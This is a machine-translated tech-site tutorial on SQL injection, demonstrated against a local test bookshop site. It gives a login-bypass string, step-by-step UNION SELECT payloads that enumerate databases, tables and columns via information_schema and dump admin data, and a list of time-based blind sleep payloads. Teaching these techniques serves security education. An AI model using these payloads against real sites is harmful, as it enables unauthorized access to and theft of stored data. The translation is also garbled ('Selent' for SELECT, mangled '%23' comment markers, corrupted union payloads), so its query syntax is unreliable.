Shulou(Shulou.com)06/01 Report--

This article mainly explains the introduction of the principle of SQL injection. The content of the explanation is simple and clear, and it is easy to learn and understand. Please follow the editor's train of thought to study and learn the principle of SQL injection.

Introduction of principle

When the Web application passes the SQL statement to the background database for database operation. If the parameters entered by the user are not strictly filtered, the attacker can construct a special SQL statement, enter it directly into the database for execution, and obtain or modify the data in the database.

There are two key conditions for SQL injection vulnerabilities:

The user can control what is entered

Web applications bring the content entered by the user into the database for execution.

Next, we will use our own locally built environment to demonstrate SQL injection. Don't think about it, how can I write the injection process of the real website on my blog? I don't want to invite you to tea.

When we open the login interface of the website, we cannot log in without a password, but because the website developer did not filter the login when developing the website, there is a universal password loophole.

Enter the universal password root'or 1 = password

Click to log in, it will prompt us to log in successfully!

Look, we've logged in!

Principle

The login statement goes like this:

SELECT * FROM admin WHERE Username='root' and Password = 'pass'

Query all the Username in the admi table = the Username we entered and Password = the result of the Password we entered

As long as the result is not empty, it is true, that is, the login is successful.

We enter the universal password root'or 1 = universal construction

SELECT * FROM admin WHERE Username='root'or 1 = 1#'and Password = 'pass'

Comment out and Password = 'pass with the annotation symbol # to make the result true on the basis of root' or 1.

SQL injection SQL injection classification

SQL injection, from a code perspective:

It can be divided into numeric type and character type, and double quotation marks and single quotation marks can be used according to character type and numeric type.

It is divided into the following categories:

1. Selent * from users where id=1 pure digits

2. Selent * from users where id='1' only with single quotation marks

3. Selent * from users where id= "1" only in double quotation marks

4. Selent * from users where (id=1) numbers in parentheses

5. Selent * from users where (id='1') digits in single quotation marks

6. Selent * from users where (id= "1") digits in double quotation marks

If the writing is not clear enough, we can explain it with a picture.

Example demonstration

Open the built environment and click to open a page to test whether there is SQL injection.

Http://127.0.0.1/bookshop/show_pro.php

There is a problem with id=55'. There may be injection.

Http://127.0.0.1/bookshop/show_pro.php

? id=55'% 23 plus% 23 returned to normal, which can be judged as'1' injection.

Http://127.0.0.1/bookshop/show_pro.php

Id=55' order by 1% 23 tests with order by 12 3 4 and finds that the result of the query is 12 columns. Here I will only show the screenshot at the end to facilitate the subsequent use of union select.

Http://127.0.0.1/bookshop/show_pro.php

? id=55' union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12% 23 found that the page does not display union select content, try to use limit or change the previous content to empty

Http://127.0.0.1/bookshop/show_pro.php

? id=55' union select 1 limit 2 limit 1 23

Http://127.0.0.1/bookshop/show_pro.php

? id=55' union select 1, 2, 3, 23 can display the content after union select, 8 is the place to display the results.

Http://127.0.0.1/bookshop/show_pro.php

? id=-55'union select 1, 2, 3, 4, 5, 6 and 7, user (), 9, 10, 10, 11, 11, 23. Change 8 bits to user () and database () and find that they can display users and databases.

Http://127.0.0.1/bookshop/show_pro.php

? id=-55'union select 1, 2, 3, 4, 5, 6, 7, (select group_concat (schema_name) from information_schema.SCHEMATA), 9, 10, 11, 12, 23

Query all library names

Http://127.0.0.1/bookshop/show_pro.php

? id=-55'union select 1, 2, 3, 4, 5, 6, 7, (select group_concat (table_name) from information_schema.TABLES where table_schema = 'test'), 9, 10, 11, 12, 23

Query all the table names in the test library

Http://127.0.0.1/bookshop/show_pro.php

? id=-55'union select 1, column_name 2, 3, 4, 5, 6, 7, (select group_concat (column_name) from information_schema.COLUMNS where table_schema = 'test' and table_name =' admin'), 9, 10, 11, 12, 23 all the field names of the admin table in the admin library of the query area.

Http://127.0.0.1/bookshop/show_pro.php

? id=-55'union select 1, 2, 3, 4, 5, 6, 7, (select group_concat (news) from test.admin), 9, 10, 11, 12, 23

Query the data in the users table in the security library. Because there is no data in this table, it will not be displayed, but you will see the content in the real world.

Delayed blind injection

Delay blind injection will have the following situations, do not make a demonstration for the time being

1' and sleep (5) 23

1') and sleep (5) 23

1') and sleep (5) 23

1 and sleep (5) 23

1) and sleep (5) 23

1) and sleep (5) 23

1 "and sleep (5) 23

1 ") and sleep (5) 23

1 ") and sleep (5) 23

Thank you for your reading, the above is the content of "introduction to the principle of SQL injection". After the study of this article, I believe you have a deeper understanding of the introduction of the principle of SQL injection, and the specific use needs to be verified in practice. Here is, the editor will push for you more related knowledge points of the article, welcome to follow!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.